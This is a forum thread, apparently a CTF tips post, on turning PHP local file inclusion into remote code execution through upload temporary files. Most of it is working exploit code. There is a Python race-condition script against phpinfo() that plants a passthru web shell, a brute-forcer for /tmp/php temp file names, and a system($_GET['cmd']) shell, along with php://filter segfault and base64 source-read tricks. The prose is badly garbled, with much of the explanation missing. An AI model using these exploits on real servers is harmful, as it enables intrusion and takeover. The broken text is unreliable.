Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]

13-07-2020, 09:31 AM ctf tips & tricks
MtucX
  • : 14
  • 86 17












CTF TIPS & TRICKS


ctf

https://www.sec4ever.com/home/showthread.php?t=19843

# LFI WITH TMP FILES

## Understanding PHP temporary files



https://www.php.net/manual/en/featur...ost-method.php

https://www.macs.hw.ac.uk/~hwloidl/d...le-upload.html

POST put method
, , global variables $_files







https://arabicprogrammer.com/article/8708534101/

default temp dir

by default

php.ini



d:/phpstudy_pro/temp

; upload_tmp_dir

wamp c:/wamp/tmp

php.ini

ubuntu

:
cat /etc/php/7.0/apache2/php.ini | grep upload_tmp
;upload_tmp_dir =
upload_tmp_dir writable .
system default temp dir .



upload_tmp_dir

temp directory

sys_get_temp_dir()
:
default

C:\Users\lol>php -r "echo sys_get_temp_dir();"
C:\Users\lol\AppData\Local\Temp

edited
   php.ini 

sys_temp_dir = "D:/phpstudy_pro/temp"

C:\Users\lol>php -r "echo sys_get_temp_dir();"
D:/phpstudy_pro/temp
C:\Users\lol>
ubuntu

:
➜ ~ php -r "echo sys_get_temp_dir();"
/tmp
➜  ~
##


temp directory
: php+4 php+6

:


:
 php
<?php
$file = tmpfile();
$path = stream_get_meta_data($file)['uri'];
print $path."\n";
windows






php????.tmp

tmp

linux


Linux

php??????






GetTempFileName()
and mkstemp()



https://stackoverflow.com/questions/...-php-generated

https://linux.die.net/man/3/mktemp

https://linux.die.net/man/3/mkstemp

https://stackoverflow.com/questions/...ame-uniqueness

https://github.com/php/php-src/blob/...mporary_file.c

PHP_LFI_rfc1867_temporary_files




PHP POST.








php

form request

###

php

crash .

##

1 - lfi


2 - /proc/self/fd/* * 10 . .


3 - . FindFirstFile method
fimap

https://github.com/kurobeats/fimap/w...rstFileExploit

## Exploiting time




## LFI With PHPInfo Assistance


https://insomniasec.com/cdn-assets/L...Assistance.pdf

http://gynvael.coldwind.pl/download....rary_files.pdf


local file include
....
phpinfo() استبدال script



:
index.php

php
<?php
include($_GET['file']);
?>
:
info.php
php
<?php
phpinfo();
?>
PHP .







upload post phpinfo

LFI


php

race condition.



:
python
import requests
import ssl
import socket
import urllib3

def SubstrFind(resp, toFind):
	if(len(toFind) > len(resp)):
		return []

	found = False
	indexes = []

	for x in range(0,(len(resp)-len(toFind))+1):
		if(ord(resp[x]) == ord(toFind[0])):
			found = True
			for i in range(0,len(toFind)):
				if(ord(resp[x+i]) != ord(toFind[i])):
					found = False
					break
		if(found):
			indexes.append(x)
			found = False
			x += len(toFind)

	return indexes

def phpinfo_ext(content):
	indexes = SubstrFind(content, "Security Test")
	found = len(indexes) > 0
	got = ""

	if(found):
		start = indexes[0]+11
		for x in range(start, len(content)):
			if(content[x] == '<'):
				break
			got += content[x]

	return got

def phpinfo_request(): 
	TAG="Security Test"
	PAYLOAD="""%s\r
<?php $c=fopen('/tmp/ccc','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
	REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
	padding="A" * 6000
	REQ1="""POST /info.php"""""" HTTP/1.1\r
Z: """+padding+"""\r
Cookie: othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: 127.0.0.1\r
\r
%s""" %(len(REQ1_DATA),REQ1_DATA)

	got = "" 
	sc = urllib3.connection_from_url('http://127.0.0.1')._new_conn()
	sc.connect()
	sc = sc.sock

	payload = REQ1
	sc.send(payload)

	resp = ''
	while 'tmp_name' not in resp:
		x = sc.recv(4096)
		if x == '':
			break
		resp += x
	if("tmp_name" in resp):
		found = 1
		lines = resp.split('\n')
		for line in lines:
			if "tmp_name]" in line:
				mystr = str(line)
				array = mystr.split()
				tmp_name = array[2]
				print(tmp_name)
				break
		tmp_url = "http://127.0.0.1/index.php?file=" + tmp_name
		r = requests.get(tmp_url)#

		content = r.content
		if 'Security Test' in content:
			print "done"
			exit()
		else:
			print('wait ... ')

	return got
		


while True:
	print(phpinfo_request())
:
 bash
sudo inotifywait -m -r /tmp



ccc








ctf challenge : https://h4dla3.github.io/post/eagle-jump/

docker container : https://github.com/vulhub/vulhub/tre.../php/inclusion


## ( php7 segment fault ) using php://filter/string.strip_tags


https://bugs.php.net/bug.php?id=75535

php

php7.0.0-7.1.2

php7.1.3-7.2.1

php7.2.2-7.2.8


lfi
php://filter/string.strip_tags
php
crash

( )


upload_tmp_dir
directory
.


segment fault
null pointer refernce


. `atoi(NULL)`









crash






:
php
<?php
include($_GET['file']);
?>

browser





















:
mtucx.txt

php
<?php
echo 'mtucx';
system($_GET['cmd']);
>




2

crash







tmp filename



burp wfuzz gobuster dirbuster ... etc











python استبدال script
:
python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests, random
import datetime

charset = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"

base_url = "http://127.0.0.1"

def get_filename():
    ret = ""
    for i in range(6):
        ret += random.choice(charset)
    return ret

def brute_force_tmp_files():
    filename = get_filename()
    url = "{}/index.php?lfi=/tmp/php{}".format(base_url, filename)
    print "php" + filename
    try:
        r = requests.get(url)
        if 'mtucx' in r.text:
            print "[+] Include success!"
            print url
            exit()
    except Exception as e:
        pass


def main():
    flag = False
    while 1:
        brute_force_tmp_files()
        pass


if __name__ == "__main__":
    main()
burpsuite
burpsuite






....



# ctf

fuzz



dir.php







md5 ==

pass=md5(??)&







:
bash
C:\Users\lol\Desktop\ffuf_1.0.2_windows_amd64>python -c "print len('fa25e54758d5d5c1927781a6ede89f8a')"
32

C:\Users\lol\Desktop\ffuf_1.0.2_windows_amd64>

32 32 == md5





redirect
flflflflfag.php





lfi

php://filter/convret.base64-encode/resource=



:
ttp://61da71ac-e4d7-4eac-96c2-58cbde529147.node3.buuoj.cn/flflflflag.php?file=php://filter/convert.base64-encode/resource=flflflflag.php

http://61da71ac-e4d7-4eac-96c2-58cbde529147.node3.buuoj.cn/flflflflag.php?file=php://filter/convert.base64-encode/resource=dir.php

decode base64

:
php
flflflflag.php

<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
	die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>

dir.php

<?php
var_dump(scandir('/tmp'));
flflflflag.php
data ....
dir.php tmp directory













dir.php




include



disable function

:
disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,scadnir,readfile,show_source,fpassthru,readdir
eval








## 3 ( convert.quoted-printable-encode )


...

2 MtucX :
30-07-2020, 01:22 PM : ctf tips & tricks
RobertFralo

online casino GunsBet https://gunsbet.xyz